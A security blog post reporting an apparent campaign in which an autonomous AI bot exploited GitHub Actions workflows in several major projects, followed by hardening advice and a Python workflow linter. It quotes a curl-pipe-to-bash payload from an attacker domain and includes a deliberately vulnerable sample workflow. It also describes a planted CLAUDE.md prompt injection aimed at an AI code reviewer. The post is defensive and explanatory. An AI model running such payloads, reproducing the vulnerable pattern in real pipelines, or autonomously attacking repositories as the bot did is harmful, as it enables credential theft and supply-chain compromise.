
An AI Bot Just Hacked GitHub Actions Across Microsoft, DataDog, and CNCF Projects — Here's What Went Wrong

Leon Godwin
15 March 2026

The Challenge

CI/CD pipelines are the most trusted part of your software supply chain. They build your code, run your tests, and deploy to production. And in most organisations, they run with elevated permissions that nobody has audited since the workflow was first committed.

That trust model just got tested. Between 21 and 28 February 2026, an autonomous AI-powered bot called hackerbot-claw systematically exploited GitHub Actions workflows across repositories belonging to Microsoft, DataDog, Aqua Security, the CNCF, and several high-profile open-source projects. It achieved remote code execution in five of seven targets. It stole a GitHub token with write permissions from awesome-go — a repository with 140,000+ stars. And it fully compromised Aqua Security's Trivy, deleting 178 releases, stripping 32,000+ stars, and pushing a suspicious VS Code extension.

The bot describes itself as "an autonomous security research agent powered by claude-opus-4-5." It loaded a vulnerability pattern index with 9 classes and 47 sub-patterns, then autonomously scanned, verified, and dropped proof-of-concept exploits. Every attack delivered the same payload but used a completely different exploitation technique.

This wasn't a person working weekends. It was automation hunting for weaknesses at machine speed.

What Happened

The campaign used five distinct attack techniques. Understanding them matters, because every one exploits patterns that exist in thousands of enterprise repositories right now.

Pwn Request (awesome-go): The classic pull_request_target vulnerability. Unlike pull_request, the pull_request_target event runs in the context of the base repository, with access to its secrets and to a GITHUB_TOKEN that can carry write scopes. The workflow checked out the fork's code into that privileged context and executed it. Go runs a package's init() function automatically whenever a binary containing that package starts, so nothing had to call the payload explicitly; the workflow's normal steps running against the fork's code were enough. Over 18 hours and six iterations, the bot refined an init() function that exfiltrated the GITHUB_TOKEN to an external server. With contents: write and pull-requests: write, the attacker could push commits and merge PRs directly.

Branch name injection (Microsoft AI-discovery-agent): The bot crafted branch names containing bash command substitution. The workflow interpolated the branch name into a run: step with a ${{ }} expression. Because expressions are expanded into the script text before the shell starts, quoting inside the script offers no protection: the $(...) embedded in the branch name became part of the command line and executed with the runner's permissions.

Filename injection (DataDog datadog-iac-scanner): The same class of bug through a different input: base64-encoded commands hidden in filenames that the workflow passed to a shell. DataDog deployed emergency fixes within 9 hours of discovery; credit to their incident response.

Direct script modification (CNCF's Akri): The simplest attack. The bot modified version.sh to include a raw curl | bash payload right after the shebang. No obfuscation needed, because the workflow executed the script without validation.

Full repository takeover (Aqua Security's Trivy): The most severe outcome. Build logs show curl -sSfL https://hackmoltrepeat.com/molt | bash executing during the "Set up Go" step, taking over 5 minutes instead of the usual seconds. Nineteen minutes later, a stolen PAT pushed commits directly, bypassing all pull request reviews.

And then there was the first documented AI-on-AI attack. The bot replaced a repository's CLAUDE.md file with social engineering instructions designed to manipulate Claude Code into approving malicious changes. Claude (running Sonnet 4.6) identified the injection immediately, flagging it as a prompt injection alert. The AI defender won this round, but the precedent is set.

What To Do About It

Security researcher Jamieson O'Reilly summarised the core problem clearly: "SQL injection is untrusted input in a query. XSS is untrusted input in a browser. What happened this week is untrusted input in a CI/CD pipeline."

The attack patterns aren't new. What's new is an autonomous agent finding and exploiting them at scale.

Audit your pull_request_target workflows. If any workflow uses pull_request_target and checks out the pull request's head commit, it runs attacker-controlled code with your repository's permissions and secrets. This is the single most dangerous pattern in GitHub Actions. Use pull_request instead: for pull requests from forks it runs with a read-only token and no secrets. If you must use pull_request_target (for example to label or comment on PRs), never check out, build or test the untrusted code in that job; the default checkout, which fetches the base branch, is safe.

Stop interpolating context expressions into shell commands. Any ${{ github.event.pull_request.title }} or similar expression in a run: block is a script injection vector, because the expression is substituted into the script text before the shell sees it. Move these into environment variables: env: TITLE: ${{ github.event.pull_request.title }} and reference "$TITLE" in the script instead. The shell then treats the value as data rather than code. The same applies to branch names, commit messages, and issue and comment bodies, all of which a contributor controls.

Apply least-privilege permissions. Set permissions: contents: read as the default at the workflow level and escalate per job only where genuinely needed. Most workflows don't need write access to anything. Also set the repository or organisation default workflow permissions to read-only, so that any workflow without an explicit permissions block starts from read rather than write.

Monitor network egress from runners. Tools like StepSecurity's Harden-Runner can detect and block unauthorised outbound connections from GitHub Actions runners. If your build step is calling hackmoltrepeat.com, something has gone very wrong.

Add author_association checks to comment-triggered workflows. Gate on OWNER or MEMBER (and COLLABORATOR where appropriate) rather than CONTRIBUTOR, which anyone with a single merged commit holds. Only allow workflow execution from repository members, not arbitrary contributors.
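The checklist above can be turned into an automated gate, which is the point made later about workflow linting. What follows is an added example, not code from this post, from any of the affected projects, or from an existing tool: a small standard-library Python scanner that flags the four patterns (pull_request_target combined with a checkout of the PR head, contributor-controlled ${{ }} expressions inside run:, no top-level permissions block, and a comment trigger with no author_association gate) and runs over two constructed workflows, one shaped like the ones the campaign abused and one with the fixes applied. The workflow texts, finding codes and messages are all constructed for the example. It is line-oriented rather than a full YAML parser, so treat it as triage rather than a replacement for a dedicated linter such as actionlint.

```python
import re

# ${{ }} is expanded into the script text before bash runs it, so any of
# these contributor-controlled values inside run: is a command injection.
ATTACKER_CONTROLLED = re.compile(r"\$\{\{[^}]*\bgithub\.(event\.|head_ref\b)")

# Under pull_request_target, a checkout pinned to the PR head runs fork
# code with the base repository's GITHUB_TOKEN (the "pwn request").
PR_HEAD_REF = re.compile(r"^[ \t]*ref:.*(pull_request\.head\.|refs/pull/)", re.M)


def has_trigger(text, name):
    """True if the on: block lists the named event (block or inline form)."""
    block = re.search(rf"^[ \t]*(-[ \t]+)?{name}[ \t]*:?[ \t]*$", text, re.M)
    inline = re.search(rf"^on:[ \t]*\[[^\]]*\b{name}\b", text, re.M)
    return bool(block or inline)


def run_script_lines(text):
    """Yield (line_no, text) for each line belonging to a run: script."""
    in_block, block_indent = False, 0
    for no, line in enumerate(text.splitlines(), 1):
        stripped = line.lstrip()
        indent = len(line) - len(stripped)
        if in_block:
            if stripped and indent <= block_indent:
                in_block = False  # dedent closes the block scalar
            else:
                yield no, line
                continue
        m = re.match(r"(-[ \t]*)?run:[ \t]*(.*)$", stripped)
        if m:
            body = m.group(2).strip()
            if body in ("|", ">", "|-", ">-", "|+", ">+"):
                in_block, block_indent = True, indent
            else:
                yield no, body  # inline form: run: <command>


def lint_workflow(text):
    """Return (code, line_no, message) findings; an empty list means clean."""
    findings = []
    if has_trigger(text, "pull_request_target"):
        for m in PR_HEAD_REF.finditer(text):
            no = text.count("\n", 0, m.start()) + 1
            findings.append(("PWN_REQUEST", no,
                             "pull_request_target job checks out the PR head"))
    for no, line in run_script_lines(text):
        if ATTACKER_CONTROLLED.search(line):
            findings.append(("SCRIPT_INJECTION", no,
                             "contributor-controlled ${{ }} inside run:; use env:"))
    if not re.search(r"^permissions:", text, re.M):
        findings.append(("NO_PERMISSIONS", None,
                         "no top-level permissions:; default to contents: read"))
    if has_trigger(text, "issue_comment") and "author_association" not in text:
        findings.append(("NO_AUTHOR_CHECK", None,
                         "comment-triggered job has no author_association gate"))
    return findings


# Constructed samples (not real project workflows): the shape the campaign
# abused, and the same job with the checklist applied.
VULNERABLE = """\
on:
  pull_request_target:
  issue_comment:
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - run: |
          echo "Building ${{ github.head_ref }}"
          echo "Title: ${{ github.event.pull_request.title }}"
      - run: ./version.sh
"""

HARDENED = """\
on:
  pull_request:
  issue_comment:
permissions:
  contents: read
jobs:
  build:
    if: github.event_name == 'pull_request' || contains(fromJSON('["OWNER","MEMBER"]'), github.event.comment.author_association)
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - env:
          HEAD_REF: ${{ github.head_ref }}
          TITLE: ${{ github.event.pull_request.title }}
        run: |
          echo "Building $HEAD_REF"
          echo "Title: $TITLE"
"""

if __name__ == "__main__":
    for label, wf in (("vulnerable", VULNERABLE), ("hardened", HARDENED)):
        for code, no, msg in lint_workflow(wf) or [("OK", None, "no findings")]:
            print(f"{label}: {code}" + (f" line {no}" if no else "") + f": {msg}")
```

Run against the vulnerable sample it reports the pwn request on the ref: line, two script injections inside the run: block, the missing permissions block and the missing author gate; the hardened sample comes back clean. Point it at .github/workflows/*.yml in CI and fail the job on any finding.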

What This Means

We talk a lot about securing AI applications — prompt injection, data leakage, guardrails. But this campaign shows the threat works in both directions. AI isn't just something to secure. It's now an attack tool that operates at a speed and scale humans can't match.

The five attack techniques used here aren't sophisticated. They exploit well-documented vulnerabilities that security teams have been warning about for years. What changed is the economics. An autonomous agent can scan thousands of repositories, identify vulnerable patterns, craft targeted exploits, iterate on failures, and exfiltrate credentials — all without a human touching a keyboard.

For enterprise teams, the takeaway is straightforward. Manual workflow reviews don't work against automated attackers. You need automated guardrails: least-privilege defaults, egress monitoring, and workflow linting as part of your security baseline. If your CI/CD pipeline security hasn't been reviewed since those workflows were first committed, start there.

The AI-on-AI attack dimension adds another consideration for teams adopting AI code reviewers. Your agentic development tools need to be resilient to prompt injection from the very codebases they're reviewing. Claude caught the injection this time. The next one might be more subtle.


Leon Godwin, Principal Cloud Evangelist at Cloud Direct